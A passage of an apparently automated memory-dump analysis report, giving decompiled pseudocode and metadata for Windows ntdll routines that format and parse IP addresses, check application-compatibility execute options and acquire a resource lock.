                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t128 = _t128 + E00987707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                            							}
                                                                                                                                                            							return _t128;
                                                                                                                                                            						} else {
                                                                                                                                                            							L14:
                                                                                                                                                            							L14:
                                                                                                                                                            							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                            								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                            									_push(":");
                                                                                                                                                            									_push(_t71 - _t128 >> 1);
                                                                                                                                                            									_push(_t128);
                                                                                                                                                            									_t128 = _t128 + E00987707() * 2;
                                                                                                                                                            									_t71 = _v20;
                                                                                                                                                            									_t130 = _t130 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								_t78 = E00987707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                            								_t130 = _t130 + 0x10;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push(L"::");
                                                                                                                                                            								_push(_t71 - _t128 >> 1);
                                                                                                                                                            								_push(_t128);
                                                                                                                                                            								_t78 = E00987707();
                                                                                                                                                            								_t130 = _t130 + 0xc;
                                                                                                                                                            								_t91 = _a8 - 1;
                                                                                                                                                            							}
                                                                                                                                                            							_t91 = _t91 + 1;
                                                                                                                                                            							_t128 = _t128 + _t78 * 2;
                                                                                                                                                            							_t71 = _v20;
                                                                                                                                                            							if(_t91 >= _v8) {
                                                                                                                                                            								goto L22;
                                                                                                                                                            							}
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L14;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						_t108 = 1;
                                                                                                                                                            						_v16 = _t129;
                                                                                                                                                            						_v24 = _t90;
                                                                                                                                                            						do {
                                                                                                                                                            							if( *_v16 == _t116) {
                                                                                                                                                            								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                            									_a4 = _v12;
                                                                                                                                                            									_a8 = _t108;
                                                                                                                                                            								}
                                                                                                                                                            								_t116 = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _t108;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v16 + 2;
                                                                                                                                                            							_t108 = _t108 + 1;
                                                                                                                                                            							_t26 =  &_v24;
                                                                                                                                                            							 *_t26 = _v24 - 1;
                                                                                                                                                            						} while ( *_t26 != 0);
                                                                                                                                                            						goto L11;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}





















                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                            • Opcode ID: 420e2c8c7698c341b34901ebca4619531a3651aee9e7d73e5c249fde920fe72b
                                                                                                                                                            • Instruction ID: 7b42dcda49a0845d8acdd824aef4a17602c9268ebfc06ee5da0cf72f04efa294
                                                                                                                                                            • Opcode Fuzzy Hash: 420e2c8c7698c341b34901ebca4619531a3651aee9e7d73e5c249fde920fe72b
                                                                                                                                                            • Instruction Fuzzy Hash: B4612771904656AADF34DF9EC8808BEBBB9FFD8301B18C42DF49A47640D234AA44CB60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E00987EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v540;
                                                                                                                                                            				unsigned int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				intOrPtr _v552;
                                                                                                                                                            				char _v556;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t33;
                                                                                                                                                            				void* _t38;
                                                                                                                                                            				unsigned int _t46;
                                                                                                                                                            				unsigned int _t47;
                                                                                                                                                            				unsigned int _t52;
                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                            				unsigned int _t62;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				void* _t70;
                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                            				signed int _t73;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				void* _t76;
                                                                                                                                                            				void* _t77;
                                                                                                                                                            
                                                                                                                                                            				_t33 =  *0xa32088; // 0x7769a8cb
                                                                                                                                                            				_v8 = _t33 ^ _t73;
                                                                                                                                                            				_v548 = _v548 & 0x00000000;
                                                                                                                                                            				_t72 = _a4;
                                                                                                                                                            				if(E00987F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                            					__eflags = _v548;
                                                                                                                                                            					if(_v548 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t62 = _t72 + 0x24;
                                                                                                                                                            					E009A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                            					_t71 = 0x214;
                                                                                                                                                            					_v544 = 0x214;
                                                                                                                                                            					E0095DFC0( &_v540, 0, 0x214);
                                                                                                                                                            					_t75 = _t74 + 0x20;
                                                                                                                                                            					_t46 =  *0xa34218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                            					__eflags = _t46;
                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t47 = _v544;
                                                                                                                                                            					__eflags = _t47;
                                                                                                                                                            					if(_t47 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t47 - 0x214;
                                                                                                                                                            					if(_t47 >= 0x214) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                            					E009A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                            					_t52 = E00960D27( &_v540, L"Execute=1");
                                                                                                                                                            					_t76 = _t75 + 0x1c;
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					__eflags = _t52;
                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                            						E009A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                            						_t71 =  &_v540;
                                                                                                                                                            						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                            						_t77 = _t76 + 0x14;
                                                                                                                                                            						_v552 = _t56;
                                                                                                                                                            						__eflags = _t71 - _t56;
                                                                                                                                                            						if(_t71 >= _t56) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L10:
                                                                                                                                                            							_t62 = E00968375(_t71, 0x20);
                                                                                                                                                            							_pop(_t69);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								 *_t62 = 0;
                                                                                                                                                            							}
                                                                                                                                                            							E009A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                            							_t77 = _t77 + 0x10;
                                                                                                                                                            							E009CE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(_t62 == 0) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            							_t31 = _t62 + 2; // 0x2
                                                                                                                                                            							_t71 = _t31;
                                                                                                                                                            							__eflags = _t71 - _v552;
                                                                                                                                                            							if(_t71 >= _v552) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                            					_push(3);
                                                                                                                                                            					_push(0x55);
                                                                                                                                                            					E009A3F92();
                                                                                                                                                            					_t38 = 1;
                                                                                                                                                            					L2:
                                                                                                                                                            					return E0095E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t38 = 0;
                                                                                                                                                            				goto L2;
                                                                                                                                                            			}




























                                                                                                                                                            APIs
                                                                                                                                                            • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 009A3F12
                                                                                                                                                            Strings
                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 009A3F75
                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 009AE2FB
                                                                                                                                                            • ExecuteOptions, xrefs: 009A3F04
                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 009A3F4A
                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 009AE345
                                                                                                                                                            • Execute=1, xrefs: 009A3F5E
                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 009A3EC4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BaseDataModuleQuery
                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                            • API String ID: 3901378454-484625025
                                                                                                                                                            • Opcode ID: e4baedfe0d445dcb49f32a7f1eb3de811c056506002522c1d49969b432d61f9e
                                                                                                                                                            • Instruction ID: ce0a10c7a9744ba75940762cdc5726fc3f7a872fae450d07c1f7de0a47803143
                                                                                                                                                            • Opcode Fuzzy Hash: e4baedfe0d445dcb49f32a7f1eb3de811c056506002522c1d49969b432d61f9e
                                                                                                                                                            • Instruction Fuzzy Hash: 9C41C831A4020C7ADF20EBD5DCC6FDAB3BCAB95705F1405A9B605A6181EA70EB458FA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00990B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				void* _t108;
                                                                                                                                                            				void* _t116;
                                                                                                                                                            				char _t120;
                                                                                                                                                            				short _t121;
                                                                                                                                                            				void* _t128;
                                                                                                                                                            				intOrPtr* _t130;
                                                                                                                                                            				char _t132;
                                                                                                                                                            				short _t133;
                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                            				signed int _t156;
                                                                                                                                                            				signed int _t174;
                                                                                                                                                            				intOrPtr _t177;
                                                                                                                                                            				intOrPtr* _t179;
                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                            				void* _t183;
                                                                                                                                                            
                                                                                                                                                            				_t179 = _a4;
                                                                                                                                                            				_t141 =  *_t179;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				if(_t141 == 0) {
                                                                                                                                                            					L41:
                                                                                                                                                            					 *_a8 = _t179;
                                                                                                                                                            					_t180 = _v24;
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_t180 != 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                            					}
                                                                                                                                                            					_t174 = _v32;
                                                                                                                                                            					if(_t174 == 0) {
                                                                                                                                                            						if(_v8 == 7) {
                                                                                                                                                            							goto L43;
                                                                                                                                                            						}
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					L43:
                                                                                                                                                            					if(_v16 != 1) {
                                                                                                                                                            						if(_v16 != 2) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            						L47:
                                                                                                                                                            						if(_t174 != 0) {
                                                                                                                                                            							E00968980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                            							_t116 = 8;
                                                                                                                                                            							E0095DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_v12 > 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_t120 = E00990CFA(_v28, 0, 0xa);
                                                                                                                                                            						_t183 = _t183 + 0xc;
                                                                                                                                                            						if(_t120 > 0xff) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                            						goto L47;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 > 4) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					_t121 = E00990CFA(_v28, _t180, 0x10);
                                                                                                                                                            					_t183 = _t183 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                            					goto L47;
                                                                                                                                                            				} else {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t123 = _v16;
                                                                                                                                                            						if(_t123 == 0) {
                                                                                                                                                            							goto L7;
                                                                                                                                                            						}
                                                                                                                                                            						_t108 = _t123 - 1;
                                                                                                                                                            						if(_t108 != 0) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						_t178 = _t141;
                                                                                                                                                            						if(E009906BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                            							if(E009906BA(_t135, _t178) == 0 || E00990A5B(_t136, _t178) == 0) {
                                                                                                                                                            								if(_t141 != 0x3a) {
                                                                                                                                                            									if(_t141 == 0x2e) {
                                                                                                                                                            										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										} else {
                                                                                                                                                            											_v24 = _v24 + 1;
                                                                                                                                                            											L27:
                                                                                                                                                            											_v16 = _v16 & 0x00000000;
                                                                                                                                                            											L28:
                                                                                                                                                            											if(_v28 == 0) {
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											_t177 = _v24;
                                                                                                                                                            											if(_t177 != 0) {
                                                                                                                                                            												if(_v12 > 3) {
                                                                                                                                                            													L6:
                                                                                                                                                            													return 0xc000000d;
                                                                                                                                                            												}
                                                                                                                                                            												_t132 = E00990CFA(_v28, 0, 0xa);
                                                                                                                                                            												_t183 = _t183 + 0xc;
                                                                                                                                                            												if(_t132 > 0xff) {
                                                                                                                                                            													goto L6;
                                                                                                                                                            												}
                                                                                                                                                            												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											if(_v12 > 4) {
                                                                                                                                                            												goto L6;
                                                                                                                                                            											}
                                                                                                                                                            											_t133 = E00990CFA(_v28, 0, 0x10);
                                                                                                                                                            											_t183 = _t183 + 0xc;
                                                                                                                                                            											_v20 = _v20 + 1;
                                                                                                                                                            											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                            											goto L20;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t130 = _t179 + 1;
                                                                                                                                                            									if( *_t130 == _t141) {
                                                                                                                                                            										if(_v32 != 0) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										}
                                                                                                                                                            										_v32 = _v8 + 1;
                                                                                                                                                            										_t156 = 2;
                                                                                                                                                            										_v8 = _v8 + _t156;
                                                                                                                                                            										L34:
                                                                                                                                                            										_t179 = _t130;
                                                                                                                                                            										_v16 = _t156;
                                                                                                                                                            										goto L28;
                                                                                                                                                            									}
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									goto L27;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _v12 + 1;
                                                                                                                                                            								if(_v24 > 0) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								goto L20;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							L20:
                                                                                                                                                            							_t179 = _t179 + 1;
                                                                                                                                                            							_t141 =  *_t179;
                                                                                                                                                            							if(_t141 == 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							}
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t141 == 0x3a) {
                                                                                                                                                            							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t130 = _t179 + 1;
                                                                                                                                                            								if( *_t130 != _t141) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_v20 = _v20 + 1;
                                                                                                                                                            								_t156 = 2;
                                                                                                                                                            								_v32 = 1;
                                                                                                                                                            								_v8 = _t156;
                                                                                                                                                            								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            								goto L34;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L8:
                                                                                                                                                            						if(_v8 > 7) {
                                                                                                                                                            							goto L41;
                                                                                                                                                            						}
                                                                                                                                                            						_t142 = _t141;
                                                                                                                                                            						if(E009906BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                            							if(E009906BA(_t124, _t142) == 0 || E00990A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t128 = 1;
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								_v28 = _t179;
                                                                                                                                                            								_v16 = 1;
                                                                                                                                                            								_v12 = 1;
                                                                                                                                                            								L39:
                                                                                                                                                            								if(_v16 == _t128) {
                                                                                                                                                            									goto L20;
                                                                                                                                                            								}
                                                                                                                                                            								goto L28;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v28 = _t179;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							_v12 = 1;
                                                                                                                                                            							goto L20;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t123 = _t108 == 1;
                                                                                                                                                            				if(_t108 == 1) {
                                                                                                                                                            					goto L8;
                                                                                                                                                            				}
                                                                                                                                                            				_t128 = 1;
                                                                                                                                                            				goto L39;
                                                                                                                                                            			}

























                                                                                                                                                            0x00990b90
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b96
                                                                                                                                                            0x00990a04
                                                                                                                                                            0x00990a04
                                                                                                                                                            0x00990b9a
                                                                                                                                                            0x00990b9a
                                                                                                                                                            0x00990b9b
                                                                                                                                                            0x00990b9f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990ba5
                                                                                                                                                            0x00990ac7
                                                                                                                                                            0x00990aca
                                                                                                                                                            0x009beacf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beade
                                                                                                                                                            0x009beade
                                                                                                                                                            0x009beae3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beaf3
                                                                                                                                                            0x009beaf6
                                                                                                                                                            0x009beaf7
                                                                                                                                                            0x009beafe
                                                                                                                                                            0x009beb01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beb01
                                                                                                                                                            0x009beacf
                                                                                                                                                            0x00990ad0
                                                                                                                                                            0x00990ad4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990ada
                                                                                                                                                            0x00990ae6
                                                                                                                                                            0x00990c34
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990c47
                                                                                                                                                            0x00990c49
                                                                                                                                                            0x00990c4a
                                                                                                                                                            0x00990c4e
                                                                                                                                                            0x00990c51
                                                                                                                                                            0x00990c54
                                                                                                                                                            0x00990c57
                                                                                                                                                            0x00990c5a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990c60
                                                                                                                                                            0x00990afb
                                                                                                                                                            0x00990afe
                                                                                                                                                            0x00990b02
                                                                                                                                                            0x00990b05
                                                                                                                                                            0x00990b08
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990b08
                                                                                                                                                            0x00990ae6
                                                                                                                                                            0x00990b44
                                                                                                                                                            0x009909f8
                                                                                                                                                            0x009909f8
                                                                                                                                                            0x009909f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009beaa0
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fassign
                                                                                                                                                            • String ID: .$:$:
                                                                                                                                                            • API String ID: 3965848254-2308638275
                                                                                                                                                            • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction ID: c25420ddcc75d8812b7bdb1aaf11f4dd9abdb8e5cf63485b3e237bc40a6d7170
                                                                                                                                                            • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction Fuzzy Hash: A6A1A071D0030ADFCF24CF5CC8497BEB7B8AF95315F24856AD8A2A7241E7349A81CB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                            			E00990554(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int* _t49;
                                                                                                                                                            				signed int _t51;
                                                                                                                                                            				signed int _t56;
                                                                                                                                                            				signed int _t58;
                                                                                                                                                            				signed int _t61;
                                                                                                                                                            				signed int _t63;
                                                                                                                                                            				void* _t66;
                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				signed int _t70;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				signed int _t81;
                                                                                                                                                            				signed int _t84;
                                                                                                                                                            				void* _t86;
                                                                                                                                                            				signed int _t93;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                            				signed int _t107;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				signed int _t115;
                                                                                                                                                            				signed int* _t119;
                                                                                                                                                            				void* _t125;
                                                                                                                                                            				void* _t126;
                                                                                                                                                            				signed int _t128;
                                                                                                                                                            				signed int _t130;
                                                                                                                                                            				signed int _t138;
                                                                                                                                                            				signed int _t144;
                                                                                                                                                            				void* _t158;
                                                                                                                                                            				void* _t159;
                                                                                                                                                            				void* _t160;
                                                                                                                                                            
                                                                                                                                                            				_t96 = _a4;
                                                                                                                                                            				_t115 =  *(_t96 + 0x28);
                                                                                                                                                            				_push(_t138);
                                                                                                                                                            				if(_t115 < 0) {
                                                                                                                                                            					_t105 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t115 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [eax], edx");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L6:
                                                                                                                                                            					_push(_t128);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L7:
                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                            						if(_t115 >= 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t49 = _t96 + 0x1c;
                                                                                                                                                            							_t106 = 1;
                                                                                                                                                            							asm("lock xadd [edx], ecx");
                                                                                                                                                            							_t115 =  *(_t96 + 0x28);
                                                                                                                                                            							__eflags = _t115;
                                                                                                                                                            							if(_t115 < 0) {
                                                                                                                                                            								L23:
                                                                                                                                                            								_t130 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a301c0;
                                                                                                                                                            									_push(_t144);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t51 = E0094F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                            									__eflags = _t51 - 0x102;
